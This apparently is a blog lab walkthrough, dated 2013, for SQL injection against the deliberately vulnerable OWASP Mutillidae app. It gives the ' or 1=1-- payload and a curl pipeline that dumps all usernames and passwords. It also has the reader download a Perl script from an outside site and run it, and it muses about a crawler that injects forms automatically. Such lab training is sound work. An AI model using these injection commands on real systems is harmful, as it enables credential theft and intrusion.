Powered by Blogger.
Home » » OWASP Top 10 Web Hacking Final Lab 7 - SQL Injection, Burpsuite, cURL, Perl Parser

OWASP Top 10 Web Hacking Final Lab 7 - SQL Injection, Burpsuite, cURL, Perl Parser

Written By Akademy on Thursday, November 21, 2013 | November 21, 2013

{ SQL Injection, Burpsuite, cURL, Perl Parser }

    OWASP Top 10 Web Hacking Final  Lab 7
  • What is Mutillidae?
    • OWASP Mutillidae II is a free, open source, deliberately vulnerable web-application providing a target for web-security enthusiast.
  • What is a SQL Injection?
    • SQL injection (also known as SQL fishing) is a technique often used to attack data driven applications.
    • This is done by including portions of SQL statements in an entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., dump the database contents to the attacker). SQL injection is a code injection technique that exploits a security vulnerability in an application's software.
    • The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
  • What is cURL?
    • cURL stands for "Client URL Request Library".
    • This is a command line tool for getting or sending files using URL syntax.
    • It supports a range of common Internet protocols, currently including HTTP, HTTPS, FTP, FTPS, SCP, SFTP, TFTP, LDAP, LDAPS, DICT, TELNET, FILE, IMAP, POP3, SMTP and RTSP.
    • (Damn Beautiful Tool in my opinion)
  • What is Burp Suite?
    • Burp Suite is a Java application that can be used to secure or crack web applications. The suite consists of different tools, such as a proxy server, a web spider, an intruder and a so-called repeater, with which requests can be automated.
    • When Burp suite is used as a proxy server and a web browser uses this proxy server, it is possible to have control of all traffic that is exchanged between the web browser and web servers. Burp makes it possible to manipulate data before it is sent to the web server.
Start Web Browser Session to Mutillidae
  1. On BackTrack, Open Firefox
    • Instructions:
      1. Click on the Firefox Icon
    • Notes (FYI):
      • If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
  2. Open Mutillidae
    • Notes (FYI):
      • Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
    • Instructions:
      1. http://192.168.1.111/mutillidae

Section 8. Go To User Info Page
  1. Go to User Info
    • Instructions:
      1. OWASP Top 10 --> A1 - SQL Injection --> SQLi - Extract Data --> User Info

Section 9. Configure Firefox Proxy Settings
  1. View Preferences
    • Instructions:
      1. Edit --> Preferences
  2. Advanced Settings...
    • Instructions:
      1. Click on the Advanced Icon
      2. Click on the Network Tab
      3. Click on the Setting... button
     
  3. Connection Settings
    • Instructions:
      1. Click on Manual proxy configurations
      2. Type "127.0.0.1" in the HTTP Proxy Text Box
      3. Type "8080" in the Port Text Box
      4. Check Use the proxy server for all protocols
      5. Click OK
      6. Click Close

Section 10. Configure Burpsuite Settings
  1. Start Burp Suite
    • Instructions:
      1. Applications --> BackTrack --> Vulnerability Assessment --> Web Application Proxies ---> Web Vulnerability Scanner --> burpsuite
  2. JRE Message
    • Instructions:
      1. Click OK
  3. Configure proxy
    • Instructions:
      1. Click on the proxy tab
      2. Click on the options tab
      3. Verify the port is set to 8080
  4. Turn on intercept
    • Instructions:
      1. Click on the proxy tab
      2. Click on the intercept tab
      3. Verify the intercept button shows "intercept is off"

Section 11. SQL Injection: Obtain Userlist (Method #1)
  1. Obtain Userlist Without Password
    • Instructions:
      1. Place the following in the Name Textbox --> ' or 1=1--
        • Make sure you put a space after the "-- "
      2. Click the View Account Details Button
    • Note(FYI):
      • The string ' or 1=1--  placed in the below query means the following:
        • Search for username that is either equal to nothing OR where 1 is equal to 1.  So, we created a condition that is always true (OR 1=1).  The "-- " string is a comment in SQL.  We used this trick to comment out the rest of the SQL query (AND password=''), which eliminates that password authentication.
      • SELECT * FROM accounts WHERE username='' or 1=1-- ' AND password=''
  2. View Results
    • Note(FYI):
      1. Notice the SQL injection returns all the usernames and their passwords.
      2. Notice the weird URL string '+or+1%3D1--+
        • + is a space
        • %3D is an equal sign (=)
        • Thus--> ' or 1=1--
      3. http://192.168.1.111/mutillidae/index.php?page=user-info.php&username='+or+1%3D1--+&password=&user-info-php-submit-button=View+Account+Details
        • What do you want to bet, we can later use the above URL string to obtain the same username and password information without using a web browser?
  3. View Post Data (With Burp Suite)
    • Instructions:
      1. Click on the Proxy Tab
      2. Click on the History Tab
      3. Click on the line that contains --> /mutillidae/index.php?page=user-info.php
      4. Click on the Request Tab
      5. Click on the Raw Tab
      6. View the GET Data String
        • Later we will populate curl with this URL string.
    • Note(FYI):
      • /mutillidae/index.php?page=user-info.php&username=%27+or+1%3D1--+&password=&user-info-php-submit-button=View+Account+Details
      • The encoded sql injection --> %27+or+1%3D1--+
        1. %27 is a single quote (')
        2. + is a space
        3. %3D is a equal sign (=)
      • The different between this step and the previous step is that Burpsuite encoded the single quote (') as %27.
Section 12. Simulate CURL SQL Injection: (Method #2)
  1. Use Curl to Display Usernames and Passwords
    • Note(FYI):
      • I apologize ahead of time for the below mess.  Match up the colors with the explanations.
      • Replace 192.168.1.111 with Mutillidae's IP Address obtained from (Section 3, Step 3).
    • Instructions:
      1. curl -b crack_cookies.txt -c crack_cookies.txt --user-agent "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" --data "page=user-info.php&username=%27+or+1%3D1--+&password=&user-info-php-submit-button=View+Account+Details" --location "http://192.168.1.111/mutillidae/index.php" | grep -i "Username=" | awk 'BEGIN{FS="<"}{for (i=1; i<=NF; i++) print $i}' | awk -F\> '{print $2}'
    • Note(FYI):
      1. --data "page=user-info.php&username=%27+or+1%3D1--+&password=&user-info-php-submit-button=View+Account+Details"
        • This is the URL POST DATA string we obtained from (Section 11, Step 3) or (Section 11, Step 2).
      2. --location "http://192.168.1.111/mutillidae/index.php"
        • This is the actual webpage script that handles the common gateway interface (CGI) between the web browser and server.
      3. awk 'BEGIN{FS="<"}{for (i=1; i<=NF; i++) print $i}'
        • Use the "<" character as a delimiter or field separator and print each array element on a separate line
      4. grep -i "Username="
        • Display lines that only have the string "Username=".  Remember that the web output from (Section 11, Step 2) contained "Username="
      5. awk -F\> '{print $2}'
        • Use ">" as a delimiter and only print the output from the second field.

Section 13. Perl Parser
  1. Create Output File
    • Note(FYI):
      • Replace 192.168.1.111 with Mutillidae's IP Address obtained from (Section 3, Step 3).
    • Instructions:
      1. cd /root
      2. curl -b crack_cookies.txt -c crack_cookies.txt --user-agent "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" --data "page=user-info.php&username=%27+or+1%3D1--+&password=&user-info-php-submit-button=View+Account+Details" --location "http://192.168.1.111/mutillidae/index.php" | grep "Username=" > lesson7.txt
      3. cat lesson7.txt
  2. Download Output Parser
    • Instructions:
      1. cd /root
      2. wget http://www.computersecuritystudent.com/SECURITY_TOOLS/MUTILLIDAE/MUTILLIDAE_2511/lesson7/lesson7.pl.TXT
      3. mv lesson7.pl.TXT lesson7.pl
      4. chmod 700 lesson7.pl
  3. Run Perl Script
    • Instructions:
      1. ./lesson7.pl
    • Note(FYI):
      • So lets put the pieces together. Imagine a web crawler that does nothing but curl webpages for the string "form".  If the string "form" is found, then try a simple SQL injection like (' or 1=1-- ).  Pretty scary stuff.

Section 14. Restore Firefox Original Proxy Configurations
  1. On BackTrack, Open Firefox
    • Instructions:
      1. Click on the Firefox Icon
    • Notes (FYI):
      • If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
  2. Firefox Preferences
    • Instructions:
      1. Edit --> Preferences
  3. Advanced Settings...
    • Instructions:
      1. Click on the Advanced Icon
      2. Click on the Network Tab
      3. Click on the Setting... button
  4. Connection Settings
    • Instructions:
      1. Click on the No proxy radio button
      2. Click on the OK button
      3. Click on the Close button

Section 15. Proof of Lab
  1. Proof of Lab  : Các bạn hãy quay lại toàn bộ quá trình thực hiện
Share this article :

0 comments:

Post a Comment

 
Trung Tâm Đào Tạo An Toàn Thông Tin Học Hacker Mũ Xám Online | Học An Ninh Mạng Trực Tuyến | CEH VIỆT NAM
Copyright © 2013. Security365 - All Rights Reserved
Web Master @ Võ Sĩ Máy Tính
Contact @ Đông Dương ICT